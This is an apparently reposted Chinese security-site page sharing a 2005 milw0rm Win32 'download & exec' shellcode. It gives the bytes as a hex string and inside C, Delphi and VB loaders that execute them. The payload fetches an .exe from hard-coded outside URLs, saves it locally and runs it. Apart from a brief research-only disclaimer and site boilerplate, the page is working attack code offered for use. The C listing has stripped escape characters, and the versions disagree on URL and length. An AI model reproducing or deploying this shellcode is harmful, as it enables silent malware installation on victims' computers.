win32 download & exec shellcode 203 bytes

admin
admin
admin
141399
文章
117
评论
2021年4月3日18:56:27评论34 views字数 4545阅读15分9秒阅读模式

milw0rm 上的 win32 download & exec shellcode:

EB548B753C8B74357803F5568B762003F533C94941AD33DB360FBE142838F27408C1CB0D03DA40EBEF3BDF75E75E8B5E2403DD668B0C4B8B5E1C03DD8B048B03C5C375726C6D6F6E2E646C6C00433A5C672E6578650033C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C95BF8E4E0EECE884FFFFFF83EC04832C243CFFD09550BF361A2F70E86FFFFFFF8B5424FC8D52BA33DB535352EB2453FFD05DBF98FE8A0EE853FFFFFF83EC04832C2462FFD0BF7ED8E273E840FFFFFF52FFD0E8D7FFFFFF687474703A2F2F7777772E786F78782E75732F646F776E6C6F61642F746573742E657865

VC+:
/*
    ______________________WIN_SHELLCODE__________________________
/ :: win32 download & exec shellcode                              ::
:: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] ::
/ :: to avoid 0x00 use ^^xor^^ }:>                                ::
:: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. ::
/ ::_____________________________cya______________________________::

*/

#include
#include

unsigned char sh4llcode[] =
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF"
"http://h0nest.org/1.exe";

int main()
{

 void (*c0de)();
 printf("Win32 "download & exec shellcode"n");
 *(int*)&c0de = sh4llcode;
 c0de();
}

// milw0rm.com [2005-12-23]

DELPHI:

program download;

const

ShellCode:Array [0..229] of Byte =
(
$EB, $54, $8B, $75, $3C, $8B, $74, $35, $78, $03,
$F5, $56, $8B, $76, $20, $03, $F5, $33, $C9, $49,
$41, $AD, $33, $DB, $36, $0F, $BE, $14, $28, $38,
$F2, $74, $08, $C1, $CB, $0D, $03, $DA, $40, $EB,
$EF, $3B, $DF, $75, $E7, $5E, $8B, $5E, $24, $03,
$DD, $66, $8B, $0C, $4B, $8B, $5E, $1C, $03, $DD,
$8B, $04, $8B, $03, $C5, $C3, $75, $72, $6C, $6D,
$6F, $6E, $2E, $64, $6C, $6C, $00, $43, $3A, $5C,
$55, $2E, $65, $78, $65, $00, $33, $C0, $64, $03,
$40, $30, $78, $0C, $8B, $40, $0C, $8B, $70, $1C,
$AD, $8B, $40, $08, $EB, $09, $8B, $40, $34, $8D,
$40, $7C, $8B, $40, $3C, $95, $BF, $8E, $4E, $0E,
$EC, $E8, $84, $FF, $FF, $FF, $83, $EC, $04, $83,
$2C, $24, $3C, $FF, $D0, $95, $50, $BF, $36, $1A,
$2F, $70, $E8, $6F, $FF, $FF, $FF, $8B, $54, $24,
$FC, $8D, $52, $BA, $33, $DB, $53, $53, $52, $EB,
$24, $53, $FF, $D0, $5D, $BF, $98, $FE, $8A, $0E,
$E8, $53, $FF, $FF, $FF, $83, $EC, $04, $83, $2C,
$24, $62, $FF, $D0, $BF, $7E, $D8, $E2, $73, $E8,
$40, $FF, $FF, $FF, $52, $FF, $D0, $E8, $D7, $FF,
$FF, $FF, $68, $74, $74, $70, $3A, $2F, $2F, $77,
$77, $77, $2E, $30, $78, $34, $66, $2E, $63, $6E,
$2F, $74, $65, $73, $74, $2E, $65, $78, $65, $00
); //www.0x4f.cn/test.exe

var
ShellCodeProc: procedure;

begin
ShellCodeProc := @ShellCode;
ShellCodeProc();
end.

VB:

Attribute VB_Name = "Module1"
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Sub Main()
Dim ShellCode
Dim download() As Byte
ShellCode = Array(&HEB, &H54, &H8B, &H75, &H3C, &H8B, &H74, &H35, &H78, &H3, _
&HF5, &H56, &H8B, &H76, &H20, &H3, &HF5, &H33, &HC9, &H49, _
&H41, &HAD, &H33, &HDB, &H36, &HF, &HBE, &H14, &H28, &H38, _
&HF2, &H74, &H8, &HC1, &HCB, &HD, &H3, &HDA, &H40, &HEB, _
&HEF, &H3B, &HDF, &H75, &HE7, &H5E, &H8B, &H5E, &H24, &H3, _
&HDD, &H66, &H8B, &HC, &H4B, &H8B, &H5E, &H1C, &H3, &HDD, _
&H8B, &H4, &H8B, &H3, &HC5, &HC3, &H75, &H72, &H6C, &H6D, _
&H6F, &H6E, &H2E, &H64, &H6C, &H6C, &H0, &H43, &H3A, &H5C, _
&H55, &H2E, &H65, &H78, &H65, &H0, &H33, &HC0, &H64, &H3, _
&H40, &H30, &H78, &HC, &H8B, &H40, &HC, &H8B, &H70, &H1C, _
&HAD, &H8B, &H40, &H8, &HEB, &H9, &H8B, &H40, &H34, &H8D, _
&H40, &H7C, &H8B, &H40, &H3C, &H95, &HBF, &H8E, &H4E, &HE, _
&HEC, &HE8, &H84, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, _
&H2C, &H24, &H3C, &HFF, &HD0, &H95, &H50, &HBF, &H36, &H1A, _
&H2F, &H70, &HE8, &H6F, &HFF, &HFF, &HFF, &H8B, &H54, &H24, _
&HFC, &H8D, &H52, &HBA, &H33, &HDB, &H53, &H53, &H52, &HEB, _
&H24, &H53, &HFF, &HD0, &H5D, &HBF, &H98, &HFE, &H8A, &HE, _
&HE8, &H53, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, &H2C, _
&H24, &H62, &HFF, &HD0, &HBF, &H7E, &HD8, &HE2, &H73, &HE8, _
&H40, &HFF, &HFF, &HFF, &H52, &HFF, &HD0, &HE8, &HD7, &HFF, _
&HFF, &HFF, &H68, &H74, &H74, &H70, &H3A, &H2F, &H2F, &H77, _
&H77, &H77, &H2E, &H30, &H78, &H34, &H66, &H2E, &H63, &H6E, _
&H2F, &H74, &H65, &H73, &H74, &H2E, &H65, &H78, &H65, &H0)

ReDim download(UBound(ShellCode))

For i = 0 To UBound(ShellCode)
     download(i) = ShellCode(i)
Next

CallWindowProc VarPtr(download(0)), ByVal 0&, ByVal 0&, ByVal 0&, ByVal 0&

End Sub

文章来源于lcx.cc:win32 download & exec shellcode 203 bytes

相关推荐: 【视频】萌猫萌狗抢薯片 - 注意狗狗动作

萌猫萌狗抢薯片,注意狗狗动作。这狗的眼神好复杂,这猫是狮子座的吧……文章来源于lcx.cc:【视频】萌猫萌狗抢薯片 - 注意狗狗动作相关推荐: Abs取、返回指定数字绝对值函数功能详解Abs 取、返回指定数字绝对值函数功能详解 功能描述:     返回数字的绝…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:56:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   win32 download & exec shellcode 203 byteshttp://cn-sec.com/archives/319305.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息